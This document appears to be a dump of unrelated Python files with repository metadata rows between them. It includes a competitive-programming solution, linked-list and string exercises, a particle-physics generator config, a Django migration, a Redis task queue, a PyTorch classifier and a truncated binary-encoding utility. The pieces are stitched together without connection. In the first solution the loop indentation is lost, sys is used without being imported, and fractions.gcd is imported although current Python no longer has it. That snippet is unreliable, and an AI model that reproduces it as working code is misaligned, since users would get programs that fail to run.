from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import permutations, combinations, product, accumulate
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from fractions import gcd
from bisect import bisect, bisect_right, bisect_left
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def S_MAP(): return map(str, input().split())
def LIST(): return list(map(int, input().split()))
def S_LIST(): return list(map(str, input().split()))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
A, B, Q = MAP()
S = [INT() for i in range(A)]
T = [INT() for i in range(B)]
X = [INT() for i in range(Q)]
S.insert(0, -INF)
S.append(INF)
T.insert(0, -INF)
T.append(INF)
for x in X:
s = bisect(S, x)
t = bisect(T, x)
# print(s, t)
# a = min(x - S[s-1], S[s] - x)
# b = min(x - T[t-1], T[t] - x)
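    # Explanatory note (added): only the nearest shrine on each side of x
    # (S[s-1], S[s]) and the nearest temple on each side (T[t-1], T[t]) can be
    # optimal, so the loops below try every such pair, visiting either the
    # shrine or the temple first, and keep the minimum total distance.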
res = INF
for a in [S[s-1], S[s]]:
for b in [T[t-1], T[t]]:
res = min(res, min(abs(a - x) + abs(b - a), abs(x - b) + abs(b - a)))
print(res)
| [
"[email protected]"
] | |
813c88604e0dc63335d38bbdd5c9a2ca78a1b246 | 0ae8d4aa8171d46e3dab71adaa26127c01360b87 | /дом_школа_дом.py | 19d65a403b75da4c938d24ecbea83163a3581925 | [] | no_license | dasherinuk/classwork | f004f7587157171cdb1c65b1eb13a721feb6c00b | 8b2efc055409576c59da878d293d8df6fd9ffb8e | refs/heads/master | 2023-06-04T16:08:53.299460 | 2021-06-19T09:18:20 | 2021-06-19T09:18:20 | 297,706,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 101 | py | rides=int(input("Enter amount of rides"))
if rides%2==0:
print("school")
else:
print("home")
| [
"[email protected]"
] | |
41cc2e1bdbdc341bf991d5e4a6e225b13acba6cb | 6710c52d04e17facbc9fb35a7df313f7a2a7bd53 | /0234. Palindrome Linked List.py | 38f97dc46d5f45578be5aaebb55f90e98ad5532b | [] | no_license | pwang867/LeetCode-Solutions-Python | 535088fbe747a453360457728cc22cf336020bd2 | 188befbfb7080ba1053ee1f7187b177b64cf42d2 | refs/heads/master | 2022-11-13T16:20:28.211707 | 2020-06-28T06:01:14 | 2020-06-28T06:01:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
# time O(n), space O(1) in place
class Solution(object):
def isPalindrome(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head or not head.next:
return True
pre, cur = None, head
fast = head.next
while fast and fast.next:
fast = fast.next.next
copy = cur.next
cur.next = pre # reverse the first half
pre, cur = cur, copy
if fast: # original list has even length
if cur.val != cur.next.val:
return False
return self.isSameList(pre, cur.next.next)
else: # odd length
return self.isSameList(pre, cur.next)
def isSameList(self, head1, head2):
while head1 and head2:
if head1.val != head2.val:
return False
head1 = head1.next
head2 = head2.next
return not head1 and not head2
"""
Given a singly linked list, determine if it is a palindrome.
Example 1:
Input: 1->2
Output: false
Example 2:
Input: 1->2->2->1
Output: true
Follow up:
Could you do it in O(n) time and O(1) space?
"""
| [
"[email protected]"
] | |
029c81b549e9282b6f68c0739e2079610361cce5 | 72246a70e272dfc279b1b4945c232f16900bb963 | /To_write_in_the_txt_file.py | 8ea3d0ff35b684318fb43fac57e91870fad16a2e | [] | no_license | stheartsachu/Python_basics_and_data_base_operations | bb15f4b06e404b8c3456061478e1a86fcb541fed | 6441eb247336cf5a0e935efc43f48d12aa32affe | refs/heads/master | 2020-06-25T09:09:59.021325 | 2019-07-28T09:35:07 | 2019-07-28T09:35:07 | 199,268,012 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # Let us simplify the code
# by using the "with" Keyword.
# write to a text file
with open('t.txt','w') as f :
    f.write('Hello World!')
# It will be closed automatically when the with block exits,
# so an explicit f.close() is not needed here.
# f = open('t.txt', mode = 'w')
# w = write (creates the file, or truncates it if it already exists)
# r = read (the default mode)
# a = append
# x = exclusive creation (fails if the file already exists)
# with = the with statement is used to wrap the execution of a block of code
# within methods defined by a context manager
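# A short follow-up sketch (added; not in the original file): read the text
# back with mode 'r' and append another line with mode 'a'. It reuses the
# 't.txt' file created above.
with open('t.txt', 'r') as f:
    print(f.read())
with open('t.txt', 'a') as f:
    f.write(' More text.')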
| [
"[email protected]"
] | |
9468f8e04cd8b22575a8e8a5cb5f2154b120d75d | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/12315011.py | 1eaf65a06d4accb4b62d4c0891406e399fbd51c4 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/12315011.py generated: Wed, 25 Jan 2017 15:25:15
#
# Event Type: 12315011
#
# ASCII decay Descriptor: {[B+ -> K+ pi+ pi- e+ mu-]cc,[B+ -> K+ pi+ pi- e- mu+]cc}
#
from Configurables import Generation
Generation().EventType = 12315011
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bu_Kpipiemu=DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 521,-521 ]
# Ad-hoc particle gun code
from Configurables import ParticleGun
pgun = ParticleGun("ParticleGun")
pgun.SignalPdgCode = 521
pgun.DecayTool = "EvtGenDecay"
pgun.GenCutTool = "DaughtersInLHCb"
from Configurables import FlatNParticles
pgun.NumberOfParticlesTool = "FlatNParticles"
pgun.addTool( FlatNParticles , name = "FlatNParticles" )
from Configurables import MomentumSpectrum
pgun.ParticleGunTool = "MomentumSpectrum"
pgun.addTool( MomentumSpectrum , name = "MomentumSpectrum" )
pgun.MomentumSpectrum.PdgCodes = [ 521,-521 ]
pgun.MomentumSpectrum.InputFile = "$PGUNSDATAROOT/data/Ebeam4000GeV/MomentumSpectrum_521.root"
pgun.MomentumSpectrum.BinningVariables = "pteta"
pgun.MomentumSpectrum.HistogramPath = "h_pteta"
from Configurables import BeamSpotSmearVertex
pgun.addTool(BeamSpotSmearVertex, name="BeamSpotSmearVertex")
pgun.VertexSmearingTool = "BeamSpotSmearVertex"
pgun.EventType = 12315011
| [
"[email protected]"
] | |
158692323da657d0cf8086a5b00d0b90d3d7c5a8 | bd4812ba7af196d2e866cbf2935b2e7308d95066 | /python/leetcode/024_swap_nodes_in_pairs.py | d79edba96ef1dc07ede242c6bafa8a371bfe4052 | [
"Apache-2.0"
] | permissive | yxun/notebook | f507201e15c4376f0655121724254c0d5275c3b1 | 00eb1953d872a9a93a13d7cf23d8e4ed641d1ce7 | refs/heads/master | 2023-09-01T03:50:48.142295 | 2023-08-17T12:11:25 | 2023-08-17T12:11:25 | 207,569,654 | 2 | 2 | Apache-2.0 | 2023-08-17T12:11:26 | 2019-09-10T13:38:49 | Java | UTF-8 | Python | false | false | 1,334 | py | #%%
"""
- Swap Nodes in Pairs
- https://leetcode.com/problems/swap-nodes-in-pairs/
- Medium
Given a linked list, swap every two adjacent nodes and return its head.
You may not modify the values in the list's nodes, only nodes itself may be changed.
Example:
Given 1->2->3->4, you should return the list as 2->1->4->3.
"""
#%%
class ListNode:
def __init__(self, data=0, next=None):
self.data = data
self.next = next
#%%
class S1:
def swapPairs(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head or not head.next:
return head
tmp = head.next
head.next = self.swapPairs(head.next.next)
tmp.next = head
return tmp
#%%
class S2:
def swapPairs(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
        if head is None or head.next is None:
return head
dummy = ListNode(-1)
dummy.next = head
cur = dummy
while cur.next and cur.next.next:
next_one, next_two, next_three = cur.next, cur.next.next, cur.next.next.next
cur.next = next_two
next_two.next = next_one
next_one.next = next_three
cur = next_one
return dummy.next
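#%%
# Quick sanity check (added; not part of the original solutions): build
# 1->2->3->4 and print the node order after S1().swapPairs. The helper below
# is illustrative only.
def _to_list(node):
    out = []
    while node:
        out.append(node.data)
        node = node.next
    return out
head = ListNode(1, ListNode(2, ListNode(3, ListNode(4))))
print(_to_list(S1().swapPairs(head)))  # expected: [2, 1, 4, 3]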
| [
"[email protected]"
] | |
11887d383e22055fe0ed0193394c2562e3d244b0 | 48934047ac284e2a9a745f00b5ec84b3d72382bf | /nyasha/blog/migrations/0005_auto__add_tag.py | e8afe3b0236239eb264ac782548a67fad230695b | [
"WTFPL"
] | permissive | Apkawa/nyasha | e36f4281c33eb6135320391349e2dadee3c01666 | 0d126e93be273ba73b005a793340501377485c3e | refs/heads/master | 2020-04-28T20:53:47.312077 | 2012-06-12T21:49:20 | 2012-06-12T21:49:20 | 1,100,616 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,518 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Tag'
db.create_table('blog_tag', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=42)),
))
db.send_create_signal('blog', ['Tag'])
# Adding M2M table for field tags on 'Post'
db.create_table('blog_post_tags', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('post', models.ForeignKey(orm['blog.post'], null=False)),
('tag', models.ForeignKey(orm['blog.tag'], null=False))
))
db.create_unique('blog_post_tags', ['post_id', 'tag_id'])
def backwards(self, orm):
# Deleting model 'Tag'
db.delete_table('blog_tag')
# Removing M2M table for field tags on 'Post'
db.delete_table('blog_post_tags')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'blog.comment': {
'Meta': {'unique_together': "(('post', 'number'),)", 'object_name': 'Comment'},
'body': ('django.db.models.fields.TextField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'number': ('django.db.models.fields.IntegerField', [], {}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['blog.Post']"}),
'reply_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Comment']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'blog.post': {
'Meta': {'unique_together': "(('id', 'user'),)", 'object_name': 'Post'},
'body': ('django.db.models.fields.TextField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['blog.Tag']", 'symmetrical': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'blog.recommend': {
'Meta': {'unique_together': "(('post', 'user'),)", 'object_name': 'Recommend'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Post']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recommends_user'", 'to': "orm['auth.User']"})
},
'blog.subscribed': {
'Meta': {'unique_together': "(('user', 'subscribe_user'),)", 'object_name': 'Subscribed'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'subscribe_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subscribed'", 'to': "orm['auth.User']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'me_subscribe'", 'to': "orm['auth.User']"})
},
'blog.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '42'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['blog']
| [
"[email protected]"
] | |
85dcc5969e56bb08a2daeb27e23d432d34c58286 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02718/s147463629.py | e093f018cdb275a578db1fcc576e49cebc099eb6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | # 161 B
N,M = list(map(int, input().split()))
A = list(map(int, input().split()))
list.sort(A, reverse=True)
print('Yes') if A[M-1] >= (sum(A)/(4*M)) else print('No') | [
"[email protected]"
] | |
1ebc38c9e5488846563e087b28f5172fb47bfd2c | fce15571b2b65769758d4885deb4365153672a47 | /task_queue/redis_impl.py | 280a7be2d96fe3b835fdcdecc0303fe4016e773c | [
"MIT"
] | permissive | xlui/eFuture | 239f66c698390af9d4c5b82b32eed81e36c177e8 | 9bb9e8faca561ca5ccfb16de5401b6acd2ec692d | refs/heads/py | 2021-06-02T23:52:08.224564 | 2019-08-24T04:57:24 | 2019-08-24T04:57:24 | 149,577,756 | 0 | 0 | MIT | 2021-03-20T00:10:07 | 2018-09-20T08:35:32 | Python | UTF-8 | Python | false | false | 1,624 | py | import datetime
import uuid
from log import logger
from task_queue import connection, QUEUE_KEY
def push(message: str, date: datetime.datetime):
"""Push a message into redis zset
:param message: message content
    :param date: the date at which this message is to be consumed
:return: None
"""
msg_id = str(uuid.uuid4())
pipeline = connection.pipeline()
pipeline.set(msg_id, message)
pipeline.zadd(QUEUE_KEY, {
msg_id: date.timestamp()
})
pipeline.execute()
logger.info(f'Save a new future email: [message: {message}, date: {date}]')
def pop():
"""Check the first task in redis(which is the task with the smallest score)
if the score(timestamp) is smaller or equal to current timestamp, the task
should be take out and done.
:return: True if task is take out, and False if it is not the time.
"""
task = connection.zrange(QUEUE_KEY, 0, 0)
if not task:
return False, 'No emails now!'
msg_id = task[0]
timestamp = connection.zscore(QUEUE_KEY, msg_id)
now = datetime.datetime.now().timestamp()
if timestamp < now or abs(timestamp - now) <= 1e-6:
message = connection.get(msg_id)
pipeline = connection.pipeline()
pipeline.zrem(QUEUE_KEY, msg_id)
pipeline.delete(msg_id)
pipeline.execute()
return True, message
return False, "It's too early now!"
if __name__ == '__main__':
now = datetime.datetime.now()
logger.debug('push hello')
push('hello', now + datetime.timedelta(seconds=10))
while True:
b, m = pop()
if b:
logger.debug(m)
| [
"[email protected]"
] | |
cbbfba9bdb63e74a1c7c05035f325aa7f0d7af7e | c49e35bc834c259cc0d7ab2165dbd48e12f6d1b6 | /model/word_attn_classifier.py | c5ac2ca9a9d5b3b24f2e003883f3afb2027270a6 | [
"MIT"
] | permissive | kenchan0226/dual_view_review_sum | f18997bce101ee3ac70d96813d75c6cb29ac921c | 2ff1c7323b98f0a8ca1dfb0341806e05b87faf52 | refs/heads/master | 2023-03-02T10:00:26.315254 | 2021-02-03T02:13:27 | 2021-02-03T02:13:27 | 266,673,121 | 19 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,184 | py | import torch
import torch.nn as nn
from torch.nn import init
from model.attention import Attention
class WordAttnClassifier(nn.Module):
def __init__(self, query_hidden_size, memory_bank_size, num_classes, attn_mode, dropout=0.0, ordinal=False, hr_enc=False):
super(WordAttnClassifier, self).__init__()
self.memory_bank_size = memory_bank_size
self.query_hidden_size = query_hidden_size
self.num_classes = num_classes
self.hr_enc = hr_enc
# for word level memory bank
self._query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
init.uniform_(self._query_vector, -0.1, 0.1)
self.attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
# for sent level memory bank
if self.hr_enc:
self._sent_query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
init.uniform_(self._sent_query_vector, -0.1, 0.1)
self.sent_attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
self.ordinal = ordinal
self.expanded_memory_size = memory_bank_size if not hr_enc else 2 * memory_bank_size
if ordinal:
self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
nn.Dropout(p=dropout),
nn.ReLU(),
nn.Linear(self.expanded_memory_size, num_classes),
nn.Sigmoid())
else:
self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
nn.Dropout(p=dropout),
nn.ReLU(),
nn.Linear(self.expanded_memory_size, num_classes),
nn.LogSoftmax(dim=1))
def forward(self, encoder_memory_bank, src_mask, sent_memory_bank=None, sent_mask=None):
"""
        :param encoder_memory_bank: [batch, src_len, memory_bank_size]
:param sent_memory_bank: [batch, sent_num, memory_bank_size]
:return:
"""
batch_size = encoder_memory_bank.size(0)
query_vector_expanded = self._query_vector.expand(batch_size, self.query_hidden_size) # [batch, query_hidden_size]
context, attn_dist, _ = self.attention_layer(query_vector_expanded, encoder_memory_bank, src_mask)
attn_dist_tuple = (attn_dist, None)
if self.hr_enc:
sent_query_vector_expanded = self._sent_query_vector.expand(batch_size, self.query_hidden_size) # [batch, query_hidden_size]
sent_context, sent_attn_dist, _ = self.sent_attention_layer(sent_query_vector_expanded, sent_memory_bank, sent_mask)
# [batch, 2 * memory_bank_size]
context = torch.cat([context, sent_context], dim=1)
attn_dist_tuple = (attn_dist, sent_attn_dist)
logit = self.classifier(context)
return logit, attn_dist_tuple
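# Illustrative usage sketch (added; not part of the original module). The
# tensor sizes, the mask layout, and the attn_mode value "general" are
# assumptions; the shapes follow the forward() docstring above.
if __name__ == "__main__":
    batch, src_len, mem_size, n_classes = 2, 7, 16, 5
    clf = WordAttnClassifier(query_hidden_size=mem_size, memory_bank_size=mem_size,
                             num_classes=n_classes, attn_mode="general")
    memory_bank = torch.randn(batch, src_len, mem_size)   # [batch, src_len, memory_bank_size]
    src_mask = torch.ones(batch, src_len)                  # 1 = real token, 0 = padding
    logit, (word_attn, sent_attn) = clf(memory_bank, src_mask)
    print(logit.shape)  # expected: torch.Size([batch, n_classes])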
| [
"[email protected]"
] | |
257d9c5993e931be92ff8bd92ceacd54ed6c9727 | 3869cbd5ee40e2bab5ca08b80b48115a7b4c1d5a | /Python-3/basic_examples/strings/string_expandtabs.py | c31cbcf03990c262555129f083b6bf6e26bbd25b | [
"MIT"
] | permissive | Tecmax/journaldev | 0774c441078816f22edfd68286621493dd271803 | 322caa8e88d98cfe7c71393bcd2a67cf77368884 | refs/heads/master | 2020-07-08T04:05:03.028015 | 2019-08-12T09:17:48 | 2019-08-12T09:17:48 | 203,559,030 | 0 | 1 | MIT | 2019-08-21T10:13:47 | 2019-08-21T10:13:47 | null | UTF-8 | Python | false | false | 559 | py | s = 'A\tB\tC\tD'
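# Explanatory note (added): str.expandtabs() replaces each '\t' with enough
# spaces so that the next character starts at the next multiple of tabsize
# (default 8); with a tabsize of 0 or a negative value the tabs are simply
# removed. The prints below demonstrate this behaviour.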
print(s)
print(s.expandtabs())
s = 'ABCD\tE\tF'
print(s)
print(s.expandtabs())
s = 'ABCDEFGHIJK\tG'
print(s.expandtabs())
s = 'ABCDEFGHIJK\t\tG'
print(s.expandtabs())
s = 'ABC\tD'
print(s)
print(s.expandtabs())
print(s.expandtabs(tabsize=0))
print(s.expandtabs(tabsize=1))
print(s.expandtabs(tabsize=2))
print(s.expandtabs(tabsize=3))
print(s.expandtabs(tabsize=4))
print(s.expandtabs(tabsize=5))
print(s.expandtabs(tabsize=6))
print(s.expandtabs(tabsize=7))
s = 'ABC\tD'
print(s.expandtabs(tabsize=-1))
print(s.expandtabs(tabsize=-3))
| [
"[email protected]"
] | |
1e21acec2110266a609612328d221ff317740237 | fff80cdaf12712704f36038479f50418253f42f3 | /redex/tools/python/file_extract.py | 51555fbbeb5606571a2b01d6e5c97431b3c873f0 | [
"MIT"
] | permissive | rudolfkopriva/Facebook | 1ea0cfbc116f68ae0317332eeb9155461af5645a | 56e4c6a83f992bb01849ad353004b28409e53eef | refs/heads/master | 2023-02-14T01:54:36.519860 | 2021-01-05T02:09:26 | 2021-01-05T02:09:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,013 | py | #! /usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import binascii
import re
import string
import struct
import sys
from io import BytesIO, StringIO
SEEK_SET = 0
SEEK_CUR = 1
SEEK_END = 2
def dump_memory(base_addr, data, num_per_line, outfile):
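    # (Added note) Writes a classic hex dump: each output line starts with
    # "0xXXXXXXXX: " for base_addr + offset, followed by up to num_per_line
    # hex bytes separated by spaces, two spaces, and an ASCII column where
    # non-printable bytes are shown as '.'.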
data_len = len(data)
hex_string = binascii.hexlify(data)
addr = base_addr
ascii_str = ""
i = 0
concat = None
if data_len > 0:
if isinstance(hex_string[0], int):
concat = lambda a, b: chr(a) + chr(b) # noqa: E731
else:
concat = lambda a, b: a + b # noqa: E731
while i < data_len:
outfile.write("0x%8.8x: " % (addr + i))
bytes_left = data_len - i
if bytes_left >= num_per_line:
curr_data_len = num_per_line
else:
curr_data_len = bytes_left
hex_start_idx = i * 2
hex_end_idx = hex_start_idx + curr_data_len * 2
curr_hex_str = hex_string[hex_start_idx:hex_end_idx]
# 'curr_hex_str' now contains the hex byte string for the
# current line with no spaces between bytes
t = iter(curr_hex_str)
# Print hex bytes separated by space
outfile.write(" ".join(concat(a, b) for a, b in zip(t, t)))
# Print two spaces
outfile.write(" ")
# Calculate ASCII string for bytes into 'ascii_str'
ascii_str = ""
for j in range(i, i + curr_data_len):
ch = data[j]
if isinstance(ch, int):
ch = chr(ch)
if ch in string.printable and ch not in string.whitespace:
ascii_str += "%c" % (ch)
else:
ascii_str += "."
# Print ASCII representation and newline
outfile.write(ascii_str)
i = i + curr_data_len
outfile.write("\n")
def last_char_is_newline(s):
if s:
return s[-1] == "\n"
return False
def hex_escape(s):
return "".join(escape(c) for c in s)
def escape(c):
if isinstance(c, int):
c = chr(c)
if c in string.printable:
if c == "\n":
return "\\n"
if c == "\t":
return "\\t"
if c == "\r":
return "\\r"
return c
c = ord(c)
if c <= 0xFF:
return "\\x" + "%02.2x" % (c)
elif c <= "\uffff":
return "\\u" + "%04.4x" % (c)
else:
return "\\U" + "%08.8x" % (c)
class FileEncode:
"""Encode binary data to a file"""
def __init__(self, f, b="=", addr_size=0):
"""Initialize with an open binary file and optional byte order and
address byte size.
"""
self.file = f
self.addr_size = addr_size
self.set_byte_order(b)
def align_to(self, align):
curr_pos = self.file.tell()
delta = curr_pos % align
if delta:
pad = align - delta
if pad != 0:
self.seek(pad, SEEK_CUR)
def seek(self, offset, whence=SEEK_SET):
if self.file:
return self.file.seek(offset, whence)
raise ValueError
def tell(self):
if self.file:
return self.file.tell()
raise ValueError
def set_byte_order(self, b):
'''Set the byte order, valid values are "big", "little", "swap",
"native", "<", ">", "@", "="'''
if b == "big":
self.byte_order = ">"
elif b == "little":
self.byte_order = "<"
elif b == "swap":
# swap what ever the current byte order is
if struct.pack("H", 1).startswith("\x00"):
self.byte_order = "<"
else:
self.byte_order = ">"
elif b == "native":
self.byte_order = "="
elif b == "<" or b == ">" or b == "@" or b == "=":
self.byte_order = b
else:
raise ValueError("Invalid byte order specified: '%s'" % (b))
def put_c_string(self, value):
self.file.write(value)
self.put_sint8(0)
def put_sint8(self, value):
"""Encode a int8_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "b", value))
def put_uint8(self, value):
"""Encode a uint8_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "B", value))
def put_sint16(self, value):
"""Encode a int16_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "h", value))
def put_uint16(self, value):
"""Encode a uint16_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "H", value))
def put_sint32(self, value):
"""Encode a int32_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "i", value))
def put_uint32(self, value):
"""Encode a uint32_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "I", value))
def put_sint64(self, value):
"""Encode a int64_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "q", value))
def put_uint64(self, value):
"""Encode a uint64_t into the file at the current file position"""
self.file.write(struct.pack(self.byte_order + "Q", value))
def put_uleb128(self, value):
"""Encode a ULEB128 into the file at the current file position"""
while value >= 0x80:
self.put_uint8(0x80 | (value & 0x7F))
value >>= 7
self.put_uint8(value)
def put_sleb128(self, value):
if value < 0:
uvalue = (1 - value) * 2
else:
uvalue = value * 2
while True:
byte = value & 0x7F
value >>= 7
uvalue >>= 7
if uvalue != 0:
byte = byte | 0x80
self.put_uint8(byte)
if uvalue == 0:
break
def put_address(self, value):
if self.addr_size == 0:
raise ValueError
self.put_uint_size(self.addr_size, value)
def put_uint_size(self, size, value):
"""Encode a unsigned integer into the file at the current file
position as an integer whose byte size is "size"."""
if size == 1:
return self.put_uint8(value)
if size == 2:
return self.put_uint16(value)
if size == 4:
return self.put_uint32(value)
if size == 8:
return self.put_uint64(value)
print("error: integers of size %u are not supported" % (size))
def fixup_uint_size(self, size, value, offset):
"""Fixup one unsigned integer in the file at "offset" bytes from
the start of the file. The current file position will be saved and
restored."""
saved_offset = self.file.tell()
self.file.seek(offset)
self.put_uint_size(size, value)
self.file.seek(saved_offset)
class FileExtract:
"""Decode binary data from a file"""
def __init__(self, f, b="=", addr_size=0):
"""Initialize with an open binary file and optional byte order and
address byte size
"""
self.file = f
self.offsets = []
self.addr_size = addr_size
self.set_byte_order(b)
def get_size(self):
pos = self.file.tell()
self.file.seek(0, SEEK_END)
len = self.file.tell()
self.file.seek(pos, SEEK_SET)
return len
def align_to(self, align):
curr_pos = self.file.tell()
delta = curr_pos % align
if delta:
pad = align - delta
if pad != 0:
self.seek(pad, SEEK_CUR)
def get_addr_size(self):
return self.addr_size
def set_addr_size(self, addr_size):
self.addr_size = addr_size
def set_byte_order(self, b):
'''Set the byte order, valid values are "big", "little", "swap",
"native", "<", ">", "@", "="'''
if b == "big":
